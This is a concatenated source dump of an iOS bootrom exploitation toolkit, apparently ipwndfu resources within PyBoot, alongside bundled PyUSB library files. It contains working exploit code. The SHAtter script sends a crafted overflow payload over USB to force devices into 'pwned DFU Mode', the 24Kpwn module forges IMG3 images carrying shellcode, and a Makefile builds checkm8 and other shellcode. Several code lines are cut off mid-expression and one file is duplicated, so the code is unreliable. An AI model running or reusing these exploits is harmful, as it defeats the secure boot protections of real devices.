20 | PADDING = 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - (20 + signed_size + 12)
21 | SHELLCODE_ADDRESS = 0x84000000 + 1 + (20 + signed_size + 12 + PADDING)
22 | STACK_ADDRESS = 0x84033EA4
23 | img3 = struct.pack('<4s3I4s', 'Img3'[::-1], 0x24200, 0x241BC, 0x23F88, 'illb'[::-1]) + img3[20:20 + signed_size] \
24 | + struct.pack('4s2I%sx' % PADDING, '24KP'[::-1], 12 + PADDING + len(shellcode) + 4, PADDING + len(shellcode) + 4) + shellcode \
25 | + struct.pack(' 0x24000
32 | assert img3[16:20] == 'illb'[::-1]
33 |
34 | obj = image3.Image3(img3)
35 | if obj.getDecryptedPayload()[:4] != '\x0e\x00\x00\xea':
36 | # This is a 24Kpwn implementation which changes DATA tag. First dword of DATA tag should look like a shellcode address.
37 | shellcode_address, = struct.unpack('= logger.getEffectiveLevel():
58 | fn = type(args[0]).__name__ + '.' + f.__name__
59 | _trace_function_call(logger, fn, *args[1:], **named_args)
60 | return f(*args, **named_args)
61 | _interop._update_wrapper(do_trace, f)
62 | return do_trace
63 | return decorator_logging
64 |
65 | # decorator for methods calls tracing
66 | def functiontrace(logger):
67 | def decorator_logging(f):
68 | if not _enable_tracing:
69 | return f
70 | def do_trace(*args, **named_args):
71 | # this if is just a optimization to avoid unecessary string formatting
72 | if logging.DEBUG >= logger.getEffectiveLevel():
73 | _trace_function_call(logger, f.__name__, *args, **named_args)
74 | return f(*args, **named_args)
75 | _interop._update_wrapper(do_trace, f)
76 | return do_trace
77 | return decorator_logging
78 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/usb/_interop.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | # All the hacks necessary to assure compatibility across all
30 | # supported versions come here.
31 | # Please, note that there is one version check for each
32 | # hack we need to do, this makes maintenance easier... ^^
33 |
34 | import sys
35 | import array
36 |
37 | __all__ = ['_reduce', '_set', '_next', '_update_wrapper']
38 |
39 | # we support Python >= 2.4
40 | assert sys.hexversion >= 0x020400f0
41 |
42 | # On Python 3, reduce became a functools module function
43 | try:
44 | import functools
45 | _reduce = functools.reduce
46 | except (ImportError, AttributeError):
47 | _reduce = reduce
48 |
49 | # all, introduced in Python 2.5
50 | try:
51 | _all = all
52 | except NameError:
53 | _all = lambda iter_ : _reduce( lambda x, y: x and y, iter_, True )
54 |
55 | # we only have the builtin set type since 2.5 version
56 | try:
57 | _set = set
58 | except NameError:
59 | import sets
60 | _set = sets.Set
61 |
62 | # On Python >= 2.6, we have the builtin next() function
63 | # On Python 2.5 and before, we have to call the iterator method next()
64 | def _next(iter):
65 | try:
66 | return next(iter)
67 | except NameError:
68 | return iter.next()
69 |
70 | # functools appeared in 2.5
71 | try:
72 | import functools
73 | _update_wrapper = functools.update_wrapper
74 | except (ImportError, AttributeError):
75 | def _update_wrapper(wrapper, wrapped):
76 | wrapper.__name__ = wrapped.__name__
77 | wrapper.__module__ = wrapped.__module__
78 | wrapper.__doc__ = wrapped.__doc__
79 | wrapper.__dict__ = wrapped.__dict__
80 |
81 | # this is used (as of May 2015) twice in core, once in backend/openusb, and in
82 | # some unit test code. It would probably be clearer if written in terms of some
83 | # definite 3.2+ API (bytearrays?) with a fallback provided for 2.4+.
84 | def as_array(data=None):
85 | if data is None:
86 | return array.array('B')
87 |
88 | if isinstance(data, array.array):
89 | return data
90 |
91 | try:
92 | return array.array('B', data)
93 | except TypeError:
94 | # When you pass a unicode string or a character sequence,
95 | # you get a TypeError if the first parameter does not match
96 | a = array.array('B')
97 | a.fromstring(data) # deprecated since 3.2
98 | return a
99 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/usb/_lookup.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Walker Inman
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""usb._lookups - Lookup tables for USB
30 | """
31 |
32 | descriptors = {
33 | 0x1 : "Device",
34 | 0x2 : "Configuration",
35 | 0x3 : "String",
36 | 0x4 : "Interface",
37 | 0x5 : "Endpoint",
38 | 0x6 : "Device qualifier",
39 | 0x7 : "Other speed configuration",
40 | 0x8 : "Interface power",
41 | 0x9 : "OTG",
42 | 0xA : "Debug",
43 | 0xB : "Interface association",
44 | 0xC : "Security",
45 | 0xD : "Key",
46 | 0xE : "Encryption type",
47 | 0xF : "Binary device object store (BOS)",
48 | 0x10 : "Device capability",
49 | 0x11 : "Wireless endpoint companion",
50 | 0x30 : "SuperSpeed endpoint companion",
51 | }
52 |
53 | device_classes = {
54 | 0x0 : "Specified at interface",
55 | 0x2 : "Communications Device",
56 | 0x9 : "Hub",
57 | 0xF : "Personal Healthcare Device",
58 | 0xDC : "Diagnostic Device",
59 | 0xE0 : "Wireless Controller",
60 | 0xEF : "Miscellaneous",
61 | 0xFF : "Vendor-specific",
62 | }
63 |
64 | interface_classes = {
65 | 0x0 : "Reserved",
66 | 0x1 : "Audio",
67 | 0x2 : "CDC Communication",
68 | 0x3 : "Human Interface Device",
69 | 0x5 : "Physical",
70 | 0x6 : "Image",
71 | 0x7 : "Printer",
72 | 0x8 : "Mass Storage",
73 | 0x9 : "Hub",
74 | 0xA : "CDC Data",
75 | 0xB : "Smart Card",
76 | 0xD : "Content Security",
77 | 0xE : "Video",
78 | 0xF : "Personal Healthcare",
79 | 0xDC : "Diagnostic Device",
80 | 0xE0 : "Wireless Controller",
81 | 0xEF : "Miscellaneous",
82 | 0xFE : "Application Specific",
83 | 0xFF : "Vendor Specific",
84 | }
85 |
86 | ep_attributes = {
87 | 0x0 : "Control",
88 | 0x1 : "Isochronous",
89 | 0x2 : "Bulk",
90 | 0x3 : "Interrupt",
91 | }
92 |
93 | MAX_POWER_UNITS_USB2p0 = 2 # mA
94 | MAX_POWER_UNITS_USB_SUPERSPEED = 8 # mA
95 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/utilities.py:
--------------------------------------------------------------------------------
1 | import subprocess, sys
2 |
3 | def apply_patches(binary, patches):
4 | for (offset, data) in patches:
5 | binary = binary[:offset] + data + binary[offset + len(data):]
6 | return binary
7 |
8 | def aes_decrypt(data, iv, key):
9 | if len(key) == 32:
10 | aes = 128
11 | elif len(key) == 64:
12 | aes = 256
13 | else:
14 | print 'ERROR: Bad AES key given to aes_decrypt. Exiting.'
15 | sys.exit(1)
16 |
17 | p = subprocess.Popen(['openssl', 'enc', '-aes-%s-cbc' % aes, '-d', '-nopad', '-iv', iv, '-K', key],
18 | stdout=subprocess.PIPE,
19 | stdin=subprocess.PIPE,
20 | stderr=subprocess.PIPE)
21 | (stdout, stderr) = p.communicate(input=data)
22 |
23 | if p.returncode != 0 or len(stderr) > 0:
24 | print 'ERROR: openssl failed: %s' % stderr
25 | sys.exit(1)
26 |
27 | return stdout
28 |
29 | def hex_dump(data, address):
30 | p = subprocess.Popen(['xxd', '-o', str(address)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
31 | (stdout, stderr) = p.communicate(input=data)
32 |
33 | if p.returncode != 0 or len(stderr) > 0:
34 | print 'ERROR: xxd failed: %s' % stderr
35 | sys.exit(1)
36 |
37 | return stdout
38 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | nor-backups/nor-*
3 | libusbfinder/libusb-*
4 | SecureROM-*
5 | n88ap-iBSS-4.3.5.img3
6 | *.ipsw
7 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/Makefile:
--------------------------------------------------------------------------------
1 | all: armv6 armv7 arm64
2 |
3 | armv6:
4 | arm-none-eabi-as -march=armv6 -mthumb --fatal-warnings -o bin/steaks4uce-shellcode.o src/steaks4uce-shellcode.S
5 | arm-none-eabi-objcopy -O binary bin/steaks4uce-shellcode.o bin/steaks4uce-shellcode.bin
6 | rm bin/steaks4uce-shellcode.o
7 |
8 | armv7:
9 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/limera1n-shellcode.o src/limera1n-shellcode.S
10 | arm-none-eabi-objcopy -O binary bin/limera1n-shellcode.o bin/limera1n-shellcode.bin
11 | rm bin/limera1n-shellcode.o
12 |
13 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/SHAtter-shellcode.o src/SHAtter-shellcode.S
14 | arm-none-eabi-objcopy -O binary bin/SHAtter-shellcode.o bin/SHAtter-shellcode.bin
15 | rm bin/SHAtter-shellcode.o
16 |
17 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/24Kpwn-shellcode.o src/24Kpwn-shellcode.S
18 | arm-none-eabi-objcopy -O binary bin/24Kpwn-shellcode.o bin/24Kpwn-shellcode.bin
19 | rm bin/24Kpwn-shellcode.o
20 |
21 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/alloc8-shellcode.o src/alloc8-shellcode.S
22 | arm-none-eabi-objcopy -O binary bin/alloc8-shellcode.o bin/alloc8-shellcode.bin
23 | rm bin/alloc8-shellcode.o
24 |
25 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/ibss-flash-nor-shellcode.o src/ibss-flash-nor-shellcode.S
26 | arm-none-eabi-objcopy -O binary bin/ibss-flash-nor-shellcode.o bin/ibss-flash-nor-shellcode.bin
27 | rm bin/ibss-flash-nor-shellcode.o
28 |
29 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/usb_0xA1_2_armv7.o src/usb_0xA1_2_armv7.S
30 | arm-none-eabi-objcopy -O binary bin/usb_0xA1_2_armv7.o bin/usb_0xA1_2_armv7.bin
31 | rm bin/usb_0xA1_2_armv7.o
32 |
33 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/checkm8_armv7.o src/checkm8_armv7.S
34 | arm-none-eabi-objcopy -O binary bin/checkm8_armv7.o bin/checkm8_armv7.bin
35 | rm bin/checkm8_armv7.o
36 |
37 | arm64:
38 | xcrun -sdk iphoneos clang src/usb_0xA1_2_arm64.S -target arm64-apple-darwin -Wall -o bin/usb_0xA1_2_arm64.o
39 | gobjcopy -O binary -j .text bin/usb_0xA1_2_arm64.o bin/usb_0xA1_2_arm64.bin
40 | rm bin/usb_0xA1_2_arm64.o
41 |
42 | xcrun -sdk iphoneos clang src/checkm8_arm64.S -target arm64-apple-darwin -Wall -o bin/checkm8_arm64.o
43 | gobjcopy -O binary -j .text bin/checkm8_arm64.o bin/checkm8_arm64.bin
44 | rm bin/checkm8_arm64.o
45 |
46 | xcrun -sdk iphoneos clang src/t8010_t8011_disable_wxn_arm64.S -target arm64-apple-darwin -Wall -o bin/t8010_t8011_disable_wxn_arm64.o
47 | gobjcopy -O binary -j .text bin/t8010_t8011_disable_wxn_arm64.o bin/t8010_t8011_disable_wxn_arm64.bin
48 | rm bin/t8010_t8011_disable_wxn_arm64.o
49 |
50 | xcrun -sdk iphoneos clang src/t8015_shellcode_arm64.S -target arm64-apple-darwin -Wall -o bin/t8015_shellcode_arm64.o
51 | gobjcopy -O binary -j .text bin/t8015_shellcode_arm64.o bin/t8015_shellcode_arm64.bin
52 | rm bin/t8015_shellcode_arm64.o
53 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/SHAtter.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on SHAtter exploit (segment overflow) by posixninja and pod2g.
2 |
3 | import struct, sys, time
4 | import dfu
5 |
6 | def generate_payload():
7 | shellcode_address = 0x8402F198 + 1
8 | data = struct.pack('<40sI', '\xF0' * 40, shellcode_address)
9 | tags = data + struct.pack('<4s2I4s2I', 'SHSH'[::-1], 12, 0, 'CERT'[::-1], 12, 0)
10 | header = struct.pack('<4s3I4s', 'Img3'[::-1], 20 + len(tags), len(tags), len(data), 'ibss'[::-1])
11 | with open('bin/SHAtter-shellcode.bin', 'rb') as f:
12 | shellcode = f.read()
13 | assert len(shellcode) <= 1024
14 | return header + tags + shellcode
15 |
16 | def exploit():
17 | print '*** based on SHAtter exploit (segment overflow) by posixninja and pod2g ***'
18 |
19 | device = dfu.acquire_device()
20 | print 'Found:', device.serial_number
21 |
22 | if 'PWND:[' in device.serial_number:
23 | print 'Device is already in pwned DFU Mode. Not executing exploit.'
24 | return
25 |
26 | if 'CPID:8930' not in device.serial_number:
27 | print 'ERROR: Not a compatible device. This exploit is for S5L8930 devices only. Exiting.'
28 | sys.exit(1)
29 |
30 | if 'SRTG:[iBoot-574.4]' not in device.serial_number:
31 | print 'ERROR: CPID is compatible, but serial number string does not match.'
32 | print 'Make sure device is in SecureROM DFU Mode and not LLB/iBSS DFU Mode. Exiting.'
33 | sys.exit(1)
34 |
35 | dfu.reset_counters(device)
36 | dfu.get_data(device, 0x40)
37 | dfu.usb_reset(device)
38 | dfu.release_device(device)
39 |
40 | device = dfu.acquire_device()
41 | dfu.request_image_validation(device)
42 | dfu.release_device(device)
43 |
44 | device = dfu.acquire_device()
45 | dfu.get_data(device, 0x2C000)
46 | dfu.release_device(device)
47 |
48 | time.sleep(0.5)
49 |
50 | device = dfu.acquire_device()
51 | dfu.reset_counters(device)
52 | dfu.get_data(device, 0x140)
53 | dfu.usb_reset(device)
54 | dfu.release_device(device)
55 |
56 | device = dfu.acquire_device()
57 | dfu.request_image_validation(device)
58 | dfu.release_device(device)
59 |
60 | device = dfu.acquire_device()
61 | dfu.send_data(device, generate_payload())
62 | dfu.get_data(device, 0x2C000)
63 | dfu.release_device(device)
64 |
65 | time.sleep(0.5)
66 |
67 | device = dfu.acquire_device()
68 | failed = 'PWND:[SHAtter]' not in device.serial_number
69 | dfu.release_device(device)
70 |
71 | if failed:
72 | print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
73 | sys.exit(1)
74 |
75 | print 'Device is now in pwned DFU Mode.'
76 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/aes-keys/S5L8920-firmware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/aes-keys/S5L8920-firmware
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/0x8015.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/0x8015.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/24Kpwn-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/24Kpwn-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/SHAtter-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/SHAtter-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/alloc8-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/alloc8-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/checkm8_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/checkm8_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/checkm8_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/checkm8_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/ibss-flash-nor-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/ibss-flash-nor-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/limera1n-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/limera1n-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/steaks4uce-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/steaks4uce-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/t8010_t8011_disable_wxn_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/t8010_t8011_disable_wxn_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/t8015_shellcode_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/t8015_shellcode_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/usb_0xA1_2_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/usb_0xA1_2_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/usb_0xA1_2_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/usb_0xA1_2_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/dfu.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | import libusbfinder
5 |
6 | MAX_PACKET_SIZE = 0x800
7 |
8 | def acquire_device(timeout=5.0, match=None, fatal=True):
9 | backend = usb.backend.libusb1.get_backend(find_library=lambda x:libusbfinder.libusb1_path())
10 | #print 'Acquiring device handle.'
11 | # Keep retrying for up to timeout seconds if device is not found.
12 | start = time.time()
13 | once = False
14 | while not once or time.time() - start < timeout:
15 | once = True
16 | for device in usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend):
17 | if match is not None and match not in device.serial_number:
18 | continue
19 | return device
20 | time.sleep(0.001)
21 | if fatal:
22 | print 'ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout
23 | sys.exit(1)
24 | return None
25 |
26 | def release_device(device):
27 | #print 'Releasing device handle.'
28 | usb.util.dispose_resources(device)
29 |
30 | def reset_counters(device):
31 | #print 'Resetting USB counters.'
32 | assert device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000) == 0
33 |
34 | def usb_reset(device):
35 | #print 'Performing USB port reset.'
36 | try:
37 | device.reset()
38 | except usb.core.USBError:
39 | # OK: doesn't happen on Yosemite but happens on El Capitan and Sierra
40 | pass
41 | #print 'Caught exception during port reset; should still work.'
42 |
43 | def send_data(device, data):
44 | #print 'Sending 0x%x of data to device.' % len(data)
45 | index = 0
46 | while index < len(data):
47 | amount = min(len(data) - index, MAX_PACKET_SIZE)
48 | assert device.ctrl_transfer(0x21, 1, 0, 0, data[index:index + amount], 5000) == amount
49 | index += amount
50 |
51 | def get_data(device, amount):
52 | #print 'Getting 0x%x of data from device.' % amount
53 | data = str()
54 | while amount > 0:
55 | part = min(amount, MAX_PACKET_SIZE)
56 | ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
57 | assert len(ret) == part
58 | data += ret.tostring()
59 | amount -= part
60 | return data
61 |
62 | def request_image_validation(device):
63 | #print 'Requesting image validation.'
64 | assert device.ctrl_transfer(0x21, 1, 0, 0, '', 1000) == 0
65 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
66 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
67 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
68 | usb_reset(device)
69 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/image3_24Kpwn.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on 24Kpwn exploit (segment overflow) by chronic, CPICH, ius, MuscleNerd, Planetbeing, pod2g, posixninja, et al.
2 |
3 | import struct
4 | import image3
5 |
6 | def exploit(img3, securerom):
7 | with open('bin/24Kpwn-shellcode.bin', 'rb') as f:
8 | shellcode = f.read()
9 | MAX_SHELLCODE_LENGTH = 1024
10 | assert len(shellcode) <= MAX_SHELLCODE_LENGTH
11 |
12 | # Check IMG3 constraints.
13 | (img3_magic, total_size, data_size, signed_size, magic) = struct.unpack('<4s3I4s', img3[:20])
14 | assert img3_magic == 'Img3'[::-1] and signed_size != 0 and magic == 'illb'[::-1]
15 | assert total_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12
16 | assert data_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
17 | assert signed_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
18 | assert 20 + signed_size + 4 <= len(img3) and img3[20 + signed_size:20 + signed_size + 4] == 'SHSH'[::-1]
19 |
20 | PADDING = 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - (20 + signed_size + 12)
21 | SHELLCODE_ADDRESS = 0x84000000 + 1 + (20 + signed_size + 12 + PADDING)
22 | STACK_ADDRESS = 0x84033EA4
23 | img3 = struct.pack('<4s3I4s', 'Img3'[::-1], 0x24200, 0x241BC, 0x23F88, 'illb'[::-1]) + img3[20:20 + signed_size] \
24 | + struct.pack('4s2I%sx' % PADDING, '24KP'[::-1], 12 + PADDING + len(shellcode) + 4, PADDING + len(shellcode) + 4) + shellcode \
25 | + struct.pack(' 0x24000
32 | assert img3[16:20] == 'illb'[::-1]
33 |
34 | obj = image3.Image3(img3)
35 | if obj.getDecryptedPayload()[:4] != '\x0e\x00\x00\xea':
36 | # This is a 24Kpwn implementation which changes DATA tag. First dword of DATA tag should look like a shellcode address.
37 | shellcode_address, = struct.unpack('= 2.4, ctypes and at least one of the
23 | builtin backends.
24 |
25 | PyUSB supports libusb 0.1, libusb 1.0 and OpenUSB, but the user does not need
26 | to worry about that, unless in some corner cases.
27 |
28 | If you have any question about PyUSB, you can use the PyUSB mailing list
29 | hosted in the SourceForge. In the PyUSB website (http://walac.github.io/pyusb)
30 | you can find instructions on how to subscribe to the mailing list.
31 |
32 | Installing PyUSB on GNU/Linux Systems
33 | =====================================
34 |
35 | These instructions are for Debian-based systems. Instructions for
36 | other flavors of GNU/Linux should be similar.
37 |
38 | You will first need to install the following packages:
39 |
40 | 1) python (PyUSB is useless without it), version >= 2.4
41 | 2) At least one of the supported libraries (libusb 1.0, libusb 0.1 or OpenUSB)
42 | 3) If your Python version is < 2.5, you have to install ctypes as a separate
43 | package, because these versions of Python does not ship it.
44 |
45 | For example, the command::
46 |
47 | $ sudo apt-get install python libusb-1.0-0
48 |
49 | should install all these packages on most Debian-based systems with
50 | access to the proper package repositories.
51 |
52 | Once the above packages are installed, you can install PyUSB
53 | with the command::
54 |
55 | $ sudo python setup.py install
56 |
57 | Run it as root from within the same directory as this README file.
58 |
59 | You can also use `pip `_ to
60 | install PyUSB::
61 |
62 | $ sudo pip install pyusb --pre
63 |
64 | Just bear in mind that you still follow to procedure to install the
65 | libusb library.
66 |
67 | For pure Debian variants
68 | ------------------------
69 |
70 | For pure Debian systems you are advised to install either the
71 | python-usb or python3-usb packages. These are prebuilt based on
72 | PyUSB and libusb-1.0::
73 |
74 | $ sudo apt-get install python-usb python3-usb
75 |
76 | You may wish to get the backported version 1.0, since PyUSB
77 | doesn't depend upon any truly unstable packages.
78 |
79 | Installing PyUSB on Windows
80 | ===========================
81 |
82 | Now that PyUSB is 100% written in Python, you install it on Windows
83 | in the same way you do on Linux::
84 |
85 | python setup.py install
86 |
87 | If you get some kind of "command not found" error, make sure to add
88 | the Python install directory to your PATH environment variable or
89 | give the complete path to the Python interpreter.
90 |
91 | Remember that you need libusb (1.0 or 0.1) or OpenUSB running on your
92 | system. For Windows users, libusb 0.1 is provided through
93 | `libusb-win32 `_
94 | package. Check the libusb website for updates
95 | (http://www.libusb.info).
96 |
97 | Reporting bugs/Submitting patches
98 | =================================
99 |
100 | Some people have been sending patches and reporting bugs directly
101 | at my email. Please, do it through
102 | `github `_, I had a hardtime tracking
103 | their names to put them in the acknowledgments file. ;-)
104 |
105 | PS: this README file was based on the great Josh Lifton's one... ^_^
106 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/usb/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""PyUSB - Easy USB access in Python
30 |
31 | This package exports the following modules and subpackages:
32 |
33 | core - the main USB implementation
34 | legacy - the compatibility layer with 0.x version
35 | backend - the support for backend implementations.
36 | control - USB standard control requests.
37 | libloader - helper module for backend library loading.
38 |
